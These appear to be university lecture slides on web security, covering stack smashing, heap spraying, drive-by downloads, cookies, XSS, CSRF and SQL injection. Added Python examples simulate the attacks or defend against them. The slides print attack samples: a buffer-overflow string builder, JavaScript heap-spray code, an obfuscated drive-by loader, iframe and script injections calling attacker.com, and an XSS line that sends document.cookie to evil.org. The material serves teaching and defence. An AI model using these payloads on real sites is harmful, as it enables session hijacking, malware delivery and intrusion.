Title: Web Security
1 Web Security
- Dr. ? ? ?
- Department of Computer Science and Information Engineering, National Central University
3 Principle of Stack Smashing Attacks
- Overwrite control transfer structures, such as return addresses or function pointers, to redirect program execution flow to code of the attacker's choosing.
- The attack string carries both the code and the address(es) of the code's entry point.
4 A Linux Process Layout and Stack Operations
- (Figure: process layout from high address to low address: kernel address space; env, argv, argc; the stack, growing downward, holding the frames of main, then G, then H; libraries; heap; BSS; data; code.)
- The calls in the figure: main() calls G(1); void G(int a) calls H(3); void H(int c) is the innermost frame.
5 Explanation of BOAs (1)
- Code in the figure:
    void G(int a) { H(3); add_g: ... }
    void H(int b) { char c[100]; int i = 0; while ((c[i++] = getch()) != EOF); }
- H's stack frame sits below G's stack frame. From high to low address it holds: b; the return address add_g; the saved frame pointer of G (ebp points here); c[99] at 0xabc; ...; c[0] at 0xaba (the figure's addresses are schematic); i; esp.
- The input string "abc" is stored into c starting at c[0]: 'a' at 0xaba, 'b' at 0xabb, 'c' at 0xabc.
- The loop never checks i against 100, so input longer than the buffer runs upward into the saved frame pointer and the return address.
6 Explanation of BOAs (2)
- Attack string, length 108 bytes (100 bytes of c + 4 bytes of saved frame pointer + 4 bytes of return address):
    x x ... x | Injected Code | x | y | 0xabc
  where x is 1 byte of filler, y is 4 bytes that overwrite the saved frame pointer, and 0xabc is the 4-byte address written over the return address.
- Same code as in the previous slide: void G(int a) { H(3); add_g: ... } and void H(int b) { char c[100]; int i = 0; while ((c[i++] = getch()) != EOF); }
- H's stack frame after the overflow, from high to low address: b; the return address add_g, now replaced by 0xabc; the saved frame pointer of G, now replaced by y; c[99] holding x; below it the Injected Code, at 0xabc; then x x ... down to c[0] at 0xaba; i; esp.
- When H returns, execution continues at 0xabc, i.e. at the injected code inside the buffer, instead of at add_g in G.
7 Injected Code
- The attacked programs usually run with root privilege; therefore the injected code is executed with root privilege.
- The injected code is already in machine-instruction form; therefore the CPU can execute it directly.
- However, this also means that the injected code must match the CPU type of the attacked host.
- Usually the injected code spawns a shell; hence, after a successful attack, the attacker has a root shell.
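As an added example (not from the slides), the following Python builds the 108-byte attack string of slides 5-6 and simulates where the overwritten return address sends execution when H() returns. Assumptions: the slide's 1-byte x filler is an x86 NOP (0x90), the slide's 0xabc is taken as the address of c[0], and the shellcode is a constructed stand-in, not real machine code.

```python
import struct
from typing import Optional

# Layout from slides 5-6: char c[100], then the saved frame pointer (4 bytes),
# then the return address (4 bytes): 100 + 4 + 4 = 108 bytes of input.
BUF_LEN = 100
SAVED_EBP_LEN = 4
RET_LEN = 4
NOP = b"\x90"      # assumption: the slide's 1-byte 'x' filler is an x86 NOP
FILLER = b"y"      # the 4 'y' bytes that land on G's saved frame pointer
BUF_ADDR = 0xabc   # assumption: the slide's 0xabc is the address of c[0]

# Constructed stand-in for shellcode (not real machine code). It contains no
# 0x90 byte, so the sled walk below can tell where the sled ends.
SHELLCODE = b"\xcc" * 4 + b"<shellcode stand-in>"


def build_attack_string(shellcode: bytes, buf_addr: int = BUF_ADDR) -> bytes:
    """Return the input that overflows c[100] in H() and redirects its return.

    Layout, low address first (as the slide draws it from c[0] upward):
    x...x | Injected Code | x | y y y y | buf_addr (little-endian)
    """
    if len(shellcode) + 1 > BUF_LEN:
        raise ValueError("shellcode does not fit in the buffer")
    sled = NOP * (BUF_LEN - len(shellcode) - 1)   # leading x bytes
    payload = sled + shellcode + NOP              # exactly c[0..99]
    saved_ebp = FILLER * SAVED_EBP_LEN            # overwrites saved ebp
    ret_addr = struct.pack("<I", buf_addr)        # x86 is little-endian
    return payload + saved_ebp + ret_addr


def sled_landing(attack: bytes, buf_addr: int = BUF_ADDR) -> Optional[int]:
    """Simulate the ret in H(): read the address the attack string left in
    the return-address slot, map it to an offset inside c, skip the NOPs and
    return the offset at which the injected code starts (None if the jump
    lands outside the buffer)."""
    slot = BUF_LEN + SAVED_EBP_LEN
    ret = struct.unpack("<I", attack[slot:slot + RET_LEN])[0]
    off = ret - buf_addr
    if not 0 <= off < BUF_LEN:
        return None
    while off < BUF_LEN and attack[off:off + 1] == NOP:
        off += 1
    return off


if __name__ == "__main__":
    atk = build_attack_string(SHELLCODE)
    print(len(atk), "bytes; return address ->",
          hex(struct.unpack("<I", atk[-4:])[0]))
    print("injected code starts at c[%d]" % sled_landing(atk))
```

The little-endian packing of the return address is the concrete form of the slide's remark that the injected material must match the CPU of the target: the same 108 bytes sent to a big-endian host would put the wrong address in the slot.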
8 Heap Spray and Drive-by Download
9 Heap Spray [Wikipedia][Nozzle]
- Heap spraying is a technique used in exploits to facilitate arbitrary code execution.
- It allocates many objects containing the attacker's exploit code in an application's heap.
- Heap spraying still requires a separate memory corruption bug to trigger the attack (something that redirects control to a heap address), but spraying greatly simplifies the exploit and increases its likelihood of success, because almost any address in the sprayed region leads to the code.
10 Heap Spray Overview [Puttaraksa]
11 Implementation - JavaScript
- Heap sprays for web browsers are commonly implemented in JavaScript.
- They spray the heap by making copies of a long string and storing these strings in an array, up to the point where enough memory has been sprayed to cover the area that the exploit targets.
- Note: the long string begins with a NOP sled and ends with shellcode.
12 Implementation - ActionScript
- In July 2009, exploits were found to be using ActionScript to spray the heap in Adobe Flash.
13 Implementation - Images
- Though it has been shown that heap spraying can be done through other means, for instance by loading image files into the process, this had not seen widespread use (as of August 2008).
14 Memory Corruption Exploit
15 Sources of Memory Corruption Exploit
- Mishandling Tag Attribute Values
- Virtual Table
16 Mishandling Tag Attribute Values (1)
- HTTP MS IE Malformed IFRAME/EMBED BO [Symantec]
- An attacker can exploit this condition by creating a malicious Web page containing a malformed IFRAME, FRAME or EMBED tag.
- Specifically, the attacker creates the IFRAME, FRAME or EMBED tag with very large string values for the 'SRC' and 'NAME' properties.
- These values are copied into fixed-size process buffers, resulting in memory corruption.
17 Mishandling Tag Attribute Values (2) [Julam]
- <IFRAME SRC=file://BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB...BBBBBBBB NAME=CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC...CCCCC></IFRAME>
  (the slide's SRC and NAME values are long runs of 'B' and 'C' characters; the runs are abbreviated here)
- Result: eip stops at address 0x769f682f
18 Mishandling Tag Attribute Values (3) [Julam]
    memory = new Array();
    for (i = 0; i < 700; i++)
        memory[i] = block + shellcode;
19 Virtual Table [Foster et al.]
- The virtual table is a lookup table of functions used to resolve function calls in a dynamic (late-binding) manner.
- Class objects and structures are often stored on the heap.
- One field of a class object is a pointer to its virtual table, called the virtual-function table pointer (__vptr).
20 Virtual Table [Foster et al.] Overview
- (Figure: two objects adjacent on the heap, each laid out as __vptr followed by char a[100].)
21 Virtual Table [Ratanaworabhan et al.] Spraying the Heap
    <SCRIPT language="text/javascript">
    shellcode = unescape("%u4343%u4343...");
    oneblock = unescape("%u0D0D%u0D0D");
    var fullblock = oneblock;
    while (fullblock.length < 0x40000) {
        fullblock += fullblock;
    }
    sprayContainer = new Array();
    for (i = 0; i < 1000; i++) {
        sprayContainer[i] = fullblock + shellcode;
    }
    </SCRIPT>
- (Figure labels: each array element is a NOP Sled, the 0x0D0D... bytes of fullblock, followed by the Shell Code. 0x0D0D0D0D serves both as a harmless x86 instruction sequence and as the address the corrupted pointer is steered to.)
22 Result
- Because the sprayed heap area may be tens of MBs, ASLR may not work as expected: the attacker no longer needs an exact address, only one that falls anywhere inside the sprayed region.
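The following Python simulation is an added example, not code from the slides or from the Nozzle paper. It models the JavaScript spray of slides 11 and 21 on a scaled-down heap (4 KB blocks, 64 copies, instead of 0x40000-byte blocks and 1000 copies) and measures how often a guessed address inside the sprayed region reaches the shellcode, versus a guess in an unsprayed window of the same size. The shellcode is a constructed stand-in and the rest of the heap is random bytes.

```python
import random

NOP = 0x90
# Constructed stand-in for shellcode (not real machine code); it contains no
# 0x90 byte, so the sled walk can tell sled from code.
SHELLCODE = b"\xcc" * 4 + b"<shellcode stand-in>"

# Scaled down from slide 21 (0x40000-byte blocks, 1000 copies); assumption:
# only the sled/shellcode geometry matters for the hit rate, not the size.
BLOCK_SIZE = 4096
COPIES = 64
HEAP_SIZE = 1 << 20


def make_block(shellcode: bytes, block_size: int = BLOCK_SIZE) -> bytes:
    """One sprayed string: a NOP sled that ends with the shellcode."""
    return bytes([NOP]) * (block_size - len(shellcode)) + shellcode


def spray(heap: bytearray, block: bytes, copies: int, start: int) -> range:
    """Store `copies` of `block` back to back from `start` (the array of
    strings in the JavaScript); return the sprayed address range."""
    for n in range(copies):
        base = start + n * len(block)
        heap[base:base + len(block)] = block
    return range(start, start + copies * len(block))


def lands_on_shellcode(heap: bytes, addr: int, shellcode: bytes) -> bool:
    """Model the CPU jumping to addr: it slides over NOPs and succeeds only if
    the shellcode begins exactly where the NOPs end."""
    while addr < len(heap) and heap[addr] == NOP:
        addr += 1
    return heap[addr:addr + len(shellcode)] == shellcode


def hit_ratio(heap: bytes, region: range, shellcode: bytes) -> float:
    """Fraction of addresses in region from which a jump reaches the
    shellcode. Walks the region backwards so every NOP reuses the verdict of
    the byte above it instead of re-walking the whole sled."""
    next_hit = lands_on_shellcode(heap, region.stop, shellcode)
    hits = 0
    for addr in reversed(region):
        if heap[addr] == NOP:
            landed = next_hit
        else:
            landed = heap[addr:addr + len(shellcode)] == shellcode
        next_hit = landed
        hits += landed
    return hits / len(region)


def simulate(seed: int = 1) -> tuple:
    """Return (hit ratio inside the sprayed region, hit ratio in an
    unsprayed window of the same size)."""
    rng = random.Random(seed)
    heap = bytearray(rng.randbytes(HEAP_SIZE))                  # unrelated heap data
    start = rng.randrange(0, HEAP_SIZE - COPIES * BLOCK_SIZE)   # any alignment
    region = spray(heap, make_block(SHELLCODE), COPIES, start)
    frozen = bytes(heap)
    # a window of equal size that does not overlap the sprayed region
    lo = 0 if start > HEAP_SIZE // 2 else HEAP_SIZE - len(region)
    return (hit_ratio(frozen, region, SHELLCODE),
            hit_ratio(frozen, range(lo, lo + len(region)), SHELLCODE))


if __name__ == "__main__":
    inside, outside = simulate()
    print(f"guess inside the sprayed region reaches shellcode: {inside:.4%}")
    print(f"guess outside the sprayed region reaches shellcode: {outside:.4%}")
```

Inside the sprayed region every address except the interior bytes of each shellcode copy works, so the hit rate is (block size - shellcode length + 1) / block size, close to 100%; outside it is zero. That ratio is why a large spray defeats address guessing even when ASLR moves the heap.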
23 Drive-by Download Attacks [Wikipedia]
- The download of spyware, a computer virus, or any kind of malware that happens without the knowledge of the user.
- Drive-by downloads may happen by
- visiting a website,
- viewing an e-mail message,
- or
- clicking on a deceptive popup window.
24 Clicking on a Deceptive Popup Window
- For instance, a user clicks on the window in the mistaken belief
- that it is an error report from his own PC,
- or
- that it is an innocuous advertisement popup.
- In such cases, the "supplier" may claim that the user "consented" to the download, though he was completely unaware of having initiated a malicious software download.
25 Drive-by Downloads using Web Pages
- Features
- Same appearance as the original webpage
- Secret downloads
- Automatic installation
- Based on vulnerabilities of browsers, plug-ins,
or OSes
26 Client side
- (Figure: on the client side a vulnerable browser fetches a page from a good web server over the WWW; the page has been modified to pull bad.htm and bad.js from the malicious web server attacker.com.)
- The injected markup:
    <iframe src="http://attacker.com/bad.htm" height=0 width=0></iframe>
    <script src="http://attacker.com/bad.js"></script>
27 Client side
- (Figure: same setup; bad.htm from attacker.com in turn sends the vulnerable browser on to attacker2.com.)
- bad.htm carries an obfuscated loader (the '%' before each byte was lost in extraction and is restored here):
    document.write(unescape("%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%0D%0A%69%66%28%6E%61%76%69%67%61%74%6F%72%2E%75%73%65%72%41%67%65%6E%74%2E%74%6F%4C%6F%77%65%72%43%61%73%65%28%29%2E%69%6E%64%65%78%4F%66%28%22%5C%78%36%44%5C%78%37%33%5C%78...
- Decoded, the fragment reads:
    <script language="javascript">
    if(navigator.userAgent.toLowerCase().indexOf("\x6D\x73\x...
  where the \xHH escapes are a second layer of obfuscation ("\x6D\x73" is "ms", the start of a user-agent check).
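As an added example, not from the slides, the following Python does two things a responder would do with the pages of slides 26-27: it decodes the hex-encoded document.write(unescape(...)) loader (the hex digits are copied from slide 27; the '%' separators are restored in code) and it scans a constructed copy of the "good" page for the injection markers of slide 26, a zero-size iframe and a script loaded from another host. The sample HTML and the page host good.example are constructed for the example.

```python
import re
from urllib.parse import unquote, urlparse

# Hex bytes exactly as printed on slide 27 (the '%' separators were lost).
SLIDE_HEX = (
    "3C73637269707420"
    "6C616E67756167653D226A617661736372"
    "697074223E0D0A6966286E61766967617"
    "46F722E757365724167656E742E746F4C"
    "6F7765724361736528292E696E6465784F"
    "6628225C7836445C7837335C78"
)

# Constructed page: the injections from slide 26 inside an otherwise benign page.
SAMPLE_HTML = """<html><body>
<h1>Good web server</h1>
<img src="/logo.png" width=200 height=80>
<iframe src="http://attacker.com/bad.htm" height=0 width=0></iframe>
<script src="http://attacker.com/bad.js"></script>
<script src="/site.js"></script>
</body></html>"""


def decode_unescape_payload(hex_bytes: str) -> str:
    """Undo document.write(unescape("%XX%XX...")): rebuild the %XX form,
    decode it, then also resolve the JavaScript \\xHH escapes that the
    decoded script uses as a second layer of obfuscation."""
    percent = "".join("%" + hex_bytes[i:i + 2]
                      for i in range(0, len(hex_bytes), 2))
    text = unquote(percent, encoding="latin-1")
    return re.sub(r"\\x([0-9A-Fa-f]{2})",
                  lambda m: chr(int(m.group(1), 16)), text)


def find_drive_by_indicators(html: str, page_host: str) -> dict:
    """Report zero-size iframes and scripts pulled from another host.
    Assumption: any host other than page_host counts as off-site."""
    tag_re = re.compile(r"<(iframe|script)\b([^>]*)>", re.I)
    src_re = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)
    zero_re = re.compile(r"""\b(height|width)\s*=\s*["']?0\b""", re.I)
    found = {"hidden_iframes": [], "offsite_scripts": []}
    for m in tag_re.finditer(html):
        tag, attrs = m.group(1).lower(), m.group(2)
        src = src_re.search(attrs)
        if not src:
            continue
        url = src.group(1)
        host = urlparse(url).hostname
        zeroed = {a.lower() for a in zero_re.findall(attrs)}
        if tag == "iframe" and zeroed == {"height", "width"}:
            found["hidden_iframes"].append(url)
        elif tag == "script" and host and host.lower() != page_host.lower():
            found["offsite_scripts"].append(url)
    return found


if __name__ == "__main__":
    print(decode_unescape_payload(SLIDE_HEX))
    print(find_drive_by_indicators(SAMPLE_HTML, "good.example"))
```

The decoder stops at whatever the slide shows; the trailing "\x" stays as-is because the slide's string is cut off there. The scanner is deliberately crude (regular expressions, no HTML parser) and is the kind of check a static web-page analysis tool, one of the "current solutions" listed on slide 29, would start from.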
28 Discuss
- Why not inject the shellcode at the first stage (i.e. inject the shellcode into the good web server's page directly)?
29 Drive-by Downloads
- Why drive-by downloads?
- Deploy malware on victims' computers
- Large scale (vs. targeted attacks)
- Bypass firewall or NAT protection (the connection is opened outward by the victim's own browser)
- Current solutions
- Static web-page analysis
- Web-site reputation
- Microsoft Killbit
31 HTTP Cookies
- HTTP cookies, sometimes known as web cookies or just cookies, are parcels of text
- sent by a server to a web browser
- and then sent back unchanged by the browser each time it accesses that server.
- HTTP cookies are used for
- authenticating,
- tracking,
- maintaining specific information about users, such as
- site preferences
- the contents of their electronic shopping carts.
- The term "cookie" is derived from "magic cookie," a well-known concept in Unix computing which inspired both the idea and the name of HTTP cookies.
32 Cookie Delivery
33 Examine the Cookies
- Most browsers supporting JavaScript allow the user to see the cookies that are active with respect to a given page by typing
    javascript:alert("Cookies: " + document.cookie)
  in the browser URL field.
- Some browsers incorporate a cookie manager for the user to see and selectively delete the cookies currently stored in the browser.
34 Third-party Cookies
- While cookies are only sent to
- the server setting them
- or
- one in the same Internet domain,
- a Web page may contain images or other components stored on servers in other domains.
- Cookies that are set during retrieval of these components are called third-party cookies.
35 Using Third-party Cookies to Track a User's Activity
- Advertising companies use third-party cookies to track a user across multiple sites.
- In particular, an advertising company can track a user across all pages where it has placed advertising images or Web bugs.
- Knowledge of the pages visited by a user allows the advertising company to target advertisements to the user's presumed preferences.
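An added example, not from the slides, that makes the rules of slides 34-35 concrete: which cookies set while a page loads count as first- or third-party, the domain-match rule that decides whether a browser attaches a cookie to a request, and how an ad network's cookie ties together visits to unrelated sites. The "Internet domain" of a host is approximated by its last two labels (an assumption; no public-suffix list), and the hosts news.example, shop.example and adnet.example are constructed.

```python
from urllib.parse import urlparse


def registrable_domain(host: str) -> str:
    """The 'Internet domain' a host belongs to, taken as its last two labels.
    Assumption: no public-suffix list, so suffixes like co.uk are not handled."""
    return ".".join(host.lower().split(".")[-2:])


def cookie_is_sent(cookie_domain: str, request_host: str) -> bool:
    """Browser domain-match rule: a cookie with Domain=d goes to host h when
    h equals d or h is a subdomain of d; never to an unrelated host."""
    d, h = cookie_domain.lstrip(".").lower(), request_host.lower()
    return h == d or h.endswith("." + d)


def classify_cookies(page_url: str, set_cookies: list) -> dict:
    """set_cookies: (URL of the component whose response carried Set-Cookie,
    the cookie's Domain). Cookies from components in the page's own domain
    are first-party; the rest are third-party."""
    page_dom = registrable_domain(urlparse(page_url).hostname)
    out = {"first_party": [], "third_party": []}
    for component_url, domain in set_cookies:
        host = urlparse(component_url).hostname
        key = "first_party" if registrable_domain(host) == page_dom else "third_party"
        out[key].append(domain.lstrip("."))
    return out


def pages_linked_by_tracker(visits: list, tracker_cookie_domain: str) -> list:
    """visits: (page URL, URL of the ad image or Web bug on that page).
    Returns the pages whose embedded image request carries the tracker's
    cookie, i.e. the visits the ad company can tie to one user."""
    return [page for page, image in visits
            if cookie_is_sent(tracker_cookie_domain, urlparse(image).hostname)]


# Constructed sample: two unrelated sites embed the same ad network's pixel;
# a third page embeds only its own image.
VISITS = [
    ("https://news.example/story/1", "https://ads.adnet.example/pixel.gif?site=news"),
    ("https://shop.example/cart", "https://ads.adnet.example/pixel.gif?site=shop"),
    ("https://shop.example/help", "https://static.shop.example/help.png"),
]
# Constructed Set-Cookie responses seen while loading the news page.
SET_COOKIES = [
    ("https://news.example/story/1", "news.example"),
    ("https://img.news.example/hero.png", ".news.example"),
    ("https://ads.adnet.example/pixel.gif?site=news", ".adnet.example"),
]

if __name__ == "__main__":
    print(classify_cookies("https://news.example/story/1", SET_COOKIES))
    print(pages_linked_by_tracker(VISITS, ".adnet.example"))
```

The tracker never receives a cookie from news.example or shop.example; it only needs its own cookie to come back on every pixel request, plus the site name it put in the pixel URL, to reconstruct the user's path across both sites.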
36 Tracking Example
37 Privacy Threat
- The possibility of building a profile of users has been considered by some a potential privacy threat,
- even when the tracking is done on a single domain,
- but especially when tracking is done across multiple domains using third-party cookies.
- For the above reason, some countries have legislation about cookies.
39 XSS Categories
- Non-persistent XSS (Reflected XSS)
- the most common type nowadays
- Persistent XSS
41 Through Hyperlinks
- An attacker may be able to embed malicious code within a hyperlink to the target site. When the client web browser follows the link, the URL sent to trusted.org includes the malicious code. The site (trusted.org) sends a page back to the browser that includes the value of criteria without validating the user-supplied input, which consequently forces the execution of code from the attacker's server (evil.org).
- For example:
    <A HREF="http://trusted.org/search.cgi?criteria=<SCRIPT SRC='http://evil.org/badkama.js'></SCRIPT>"> Go to trusted.org </A>
- In the attack above, one source is inserting code into pages sent by another source.
- Note that this attack
- disguises the link as a link to http://trusted.org,
- can be easily included in an HTML email message,
- does not supply the malicious code inline; it is downloaded from http://evil.org. Thus the attacker retains control of the script and can update or remove the exploit code at any time.
- (Figure: web browser and trusted.org exchanging the request and the reflected page.)
42 Ways to Deploy Hyperlinks
- The user will most likely click on such a link from
- another website,
- an instant message,
- or
- simply while reading a web board or email message.
43 Non-persistent Cross Site Scripting (XSS)
- A non-persistent cross-site scripting (XSS) vulnerability is caused by the failure of a web-based application to validate user-supplied input before returning it to the client system.
- By causing the victim's browser to execute injected code under the same permissions as the web application's domain, an attacker can bypass the traditional Document Object Model (DOM) security restrictions, which can result in
- cookie theft,
- account hijacking,
- changing of web application account settings,
- spreading of a webmail virus, etc.
44 The Most Common Victims of Non-persistent XSS
- The most common web components that fall victim to XSS vulnerabilities include
- CGI scripts,
- search engines,
- interactive bulletin boards,
- and
- custom error pages with poorly written input validation routines.
- Each of these components could generate a web page.
- Additionally, a victim doesn't necessarily have to click on a link: XSS code can also be made to load automatically in an HTML e-mail with certain manipulations of the IMG or IFRAME HTML tags.
45 Hijack Web Application Sessions
- The most popular (and devastating) XSS attack is the harvesting of
- authentication cookies
- and
- session management tokens.
- With this information, it is often a trivial exercise for an attacker to hijack the victim's active session, completely bypassing the authentication process.
46 Traditional Non-persistent XSS Web Application Hijack Scenario (1)
- The attacker investigates an interesting site
- that normal users must authenticate to gain access to
- and
- that tracks the authenticated user through the use of cookies or session IDs.
- The attacker finds an XSS-vulnerable page on the site, for instance http://trusted.org/account.asp.
- Using a little social engineering,
- the attacker creates a special link to the site
- and
- embeds it in an HTML email that he sends to a long list of potential victims.
47 Traditional Non-persistent XSS Web Application Hijack Scenario (2)
- Embedded within the special link are some coding elements specially designed to transmit a copy of the victim's cookie back to the attacker. For instance:
    <img src="http://trusted.org/account.asp?ak=<script>document.location.replace('http://evil.org/steal.cgi?'+document.cookie)</script>">
- Unknown to the victim, the attacker has now received a copy of their cookie information.
- The attacker now visits the web site and, by substituting his cookie information with that of the victim, is perceived to be the victim by the server application.
48 Traditional Non-persistent XSS Web Application Hijack Steps [David Endler]
49 Solutions and Workarounds [David Endler]
50 For Users
- As a web application user, there are a few ways to protect yourself from XSS attacks.
- The first and most effective solution is to disable all scripting language support in your browser and email reader.
- If this is not a feasible option for business reasons, another recommendation is to use reasonable caution when clicking links in anonymous e-mails and dubious web pages.
51 Web Application Developers and Vendors
- Web application developers and vendors should ensure that all user input is parsed and filtered properly.
- User input includes
- things stored in GET query strings,
- POST data,
- cookies,
- URLs,
- and
- in general any persistent data that is transmitted between the browser and web server.
52 User Input Filtering
- The best philosophy to follow regarding user input filtering is to deny all but a pre-selected set of benign characters in the web input stream.
- This spares developers from having to constantly predict and update all forms of malicious input in order to deny only specific characters (such as <, ?, etc.).
- Some decent guidelines for input filtering can be found in the OWASP requirements document "OWASP Guide to Building Secure Web Applications and Web Services".
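An added example, not from the slides, that puts the hijack payload of slide 47 through three versions of a search page: the vulnerable one that echoes the input, a denylist filter of the kind slide 52 argues against, and the two defences the slide recommends, output encoding and an allowlist on input. The page layout and the allowlist character set are assumptions for the example.

```python
import html
import re

# The cookie-stealing payload from the hijack scenario (slide 47).
COOKIE_THEFT = ("<script>document.location.replace("
                "'http://evil.org/steal.cgi?'+document.cookie)</script>")

# Allowlist for a search term: deny everything except this pre-selected set
# of benign characters (assumption: letters, digits, space, _ . - up to 64).
SAFE_INPUT = re.compile(r"[A-Za-z0-9 _.\-]{1,64}")


def render_results_vulnerable(criteria: str) -> str:
    """The failing pattern: user input echoed into HTML without validation,
    so the browser runs whatever the URL carried."""
    return f"<p>Results for: {criteria}</p>"


def render_results_denylist(criteria: str) -> str:
    """The weak fix the slide warns against: strip one known bad string.
    It misses case variants and nested tags that reassemble after stripping."""
    return f"<p>Results for: {criteria.replace('<script>', '')}</p>"


def render_results_escaped(criteria: str) -> str:
    """Output encoding: the same page with the value HTML-escaped, so a
    <script> tag arrives as text, not markup."""
    return f"<p>Results for: {html.escape(criteria, quote=True)}</p>"


def accept_input(criteria: str) -> bool:
    """Input filtering as recommended: reject anything outside the allowlist
    instead of enumerating bad characters."""
    return SAFE_INPUT.fullmatch(criteria) is not None


def contains_script(markup: str) -> bool:
    """What a scanner checks in the response: is there a live <script> tag?"""
    return re.search(r"<script\b", markup, re.I) is not None


if __name__ == "__main__":
    for name, render in [("vulnerable", render_results_vulnerable),
                         ("denylist", render_results_denylist),
                         ("escaped", render_results_escaped)]:
        print(f"{name:10} executes script: {contains_script(render(COOKIE_THEFT))}")
    print("allowlist accepts payload:", accept_input(COOKIE_THEFT))
```

The denylist version happens to stop the slide's exact payload, which is what makes it dangerous: "<SCRIPT>" or "<scr<script>ipt>" walk straight through it, while the escaped page and the allowlist need no knowledge of the payload at all.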
53 Test
- Once an application has evolved out of the design and development phases, it is important to periodically test for XSS vulnerabilities, since application functionality is constantly changing due to
- upgrades,
- integration of third-party technologies,
- decentralized website authoring.
54 Web Application Vulnerability Scanners
- Many web application vulnerability scanners are starting to include checks for XSS.
- The OWASP Testing group plans to produce a methodology for checking XSS on a web application.
- WebScarab
55 Examples Used to Bypass Being Detected
56 XSS Tool
57 Cross-site Request Forgery [Wikipedia]
58 Definition
- Cross-site request forgery, also known as one-click attack or session riding and abbreviated as CSRF ("sea-surf") or XSRF, is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts.
59 Background
- CSRF vulnerabilities have been known and in some cases exploited since the 1990s.
- Because it is carried out from the user's IP address, CSRF is untraceable without proper logging.
60 Impact
- As of 2007 there were few well-documented examples.
- About 18 million users of eBay's Internet Auction Co. at Auction.co.kr in Korea lost personal information in February 2008.
- Customers of a bank in Mexico were attacked in early 2008 with an image tag in email.
61 Example
- One user, Bob, might be browsing a chat forum where another user, Mallory, has posted a message.
- Suppose that Mallory has crafted an HTML image element that references a script on Bob's bank's website (rather than an image file), e.g.
    <img src="http://bank.example/withdraw?account=bob&amount=1000000&for=mallory">
- If Bob's bank keeps his authentication information in a cookie
- and
- if the cookie hasn't expired,
- then the attempt by Bob's browser to load the image will submit the withdrawal request with his cookie, thus authorizing a transaction without Bob's approval.
62 Common CSRF Characteristics
- Involve sites that rely on a user's identity
- Exploit the site's trust in that identity
- Trick the user's browser into sending HTTP requests to a target site
- Involve HTTP requests that have side effects
63 Common CSRF Victims
- At risk are web applications that perform actions based on input from trusted and authenticated users without requiring the user to authorize the specific action.
- A user that is authenticated by a cookie saved in his web browser could unknowingly send an HTTP request to a site that trusts him and thereby cause an unwanted action.
64 Common CSRF Pitfalls
- CSRF attacks using images are often made from Internet forums, where users are allowed to post images but not JavaScript.
65 CSRF Assumptions
- This attack relies on a few assumptions:
- The attacker has knowledge of sites on which the victim has current authentication (more common on web forums, where this attack is most common).
- The attacker's "target site" has authentication cookies, or the victim has a current session cookie with the target site.
- The "target site" doesn't have secondary authentication for actions (such as form tokens).
66 Example
- Assume a script in the document at http://store.company.com/dir/other.html executes the following statement:
    document.domain = "company.com";
- After that statement executes, the page would pass the origin check with http://company.com/dir/page.html.
- However, by the same reasoning, company.com could not set document.domain to othercompany.com.
67 Prevention
- For the web site, switching from
- a persistent authentication method (e.g. a cookie or HTTP authentication)
- to
- a transient authentication method (e.g. a hidden field provided on every form)
- will help prevent these attacks.
- A similar approach is to include a secret, user-specific token in forms (a hidden field of the form, or a field the user fills out) that is verified in addition to the cookie.
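An added example, not from the slides, that implements the prevention of slide 67 against the image-tag attack of slide 61: the bank's withdraw endpoint before and after, with a secret user-specific token (an HMAC over the session id, an assumption; any unguessable per-session value would do) carried in a hidden form field and verified in addition to the cookie, and side effects restricted to POST. The server secret, session id and bank.example URL are constructed for the example.

```python
import hashlib
import hmac
from typing import Optional
from urllib.parse import parse_qs, urlparse

# Constructed values: in a real deployment the secret is random per server
# and the session id comes from the login cookie.
SERVER_SECRET = b"constructed-server-secret"
BOB_SESSION = "sess-bob-7f3a"


def csrf_token(session_id: str, secret: bytes = SERVER_SECRET) -> str:
    """Secret, user-specific token: an HMAC over the session id. Mallory's
    forum post can make Bob's browser send his cookie, but it cannot read
    the token out of the bank's own form, so it cannot forge this value."""
    return hmac.new(secret, session_id.encode(), hashlib.sha256).hexdigest()


def verify_token(session_id: str, token: Optional[str],
                 secret: bytes = SERVER_SECRET) -> bool:
    return token is not None and hmac.compare_digest(
        csrf_token(session_id, secret), token)


def withdraw_form(session_id: str) -> str:
    """The bank's form: the token travels in a hidden field, per session."""
    return ('<form method="POST" action="/withdraw">'
            f'<input type="hidden" name="csrf_token" value="{csrf_token(session_id)}">'
            '<input name="account"><input name="amount"><input name="for">'
            '</form>')


def withdraw_vulnerable(method: str, cookies: dict, params: dict) -> tuple:
    """Before: any request that carries the session cookie is honoured."""
    if "session" not in cookies:
        return 401, "not logged in"
    return 200, f"withdrew {params['amount']} from {params['account']} for {params['for']}"


def withdraw_protected(method: str, cookies: dict, params: dict) -> tuple:
    """After: side effects only on POST, and the hidden-field token must
    verify in addition to the cookie."""
    session_id = cookies.get("session")
    if session_id is None:
        return 401, "not logged in"
    if method != "POST":
        return 405, "withdrawals must be POSTed"
    if not verify_token(session_id, params.get("csrf_token")):
        return 403, "missing or bad CSRF token"
    return 200, f"withdrew {params['amount']} from {params['account']} for {params['for']}"


def mallory_image_request() -> tuple:
    """What Bob's browser sends when it loads Mallory's <img> tag: a GET with
    the URL's query and Bob's cookie, and nothing else."""
    url = "http://bank.example/withdraw?account=bob&amount=1000000&for=mallory"
    params = {k: v[0] for k, v in parse_qs(urlparse(url).query).items()}
    return "GET", {"session": BOB_SESSION}, params


def bob_legit_request() -> tuple:
    """Bob submits the bank's own form, which carried his token."""
    params = {"account": "bob", "amount": "10", "for": "alice",
              "csrf_token": csrf_token(BOB_SESSION)}
    return "POST", {"session": BOB_SESSION}, params


if __name__ == "__main__":
    print("vulnerable bank, image tag:", withdraw_vulnerable(*mallory_image_request()))
    print("protected bank, image tag: ", withdraw_protected(*mallory_image_request()))
    print("protected bank, Bob's form:", withdraw_protected(*bob_legit_request()))
```

Rejecting GET alone is not enough: a forum that allowed a hidden auto-submitting form could POST the same parameters, which is why the protected handler also refuses a POST that lacks the token.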
69 What is SQL Injection?
- Many web pages take parameters from web users and make SQL queries to the database.
- Take for instance when a user logs in to a web page: the web page accepts that user name and password and makes an SQL query to the database to check if the user has a valid name and password.
- With SQL injection, it is possible for us to send a crafted user name and/or password field that will change the SQL query and thus grant us something else.
70 SQL Injection Attack Channels
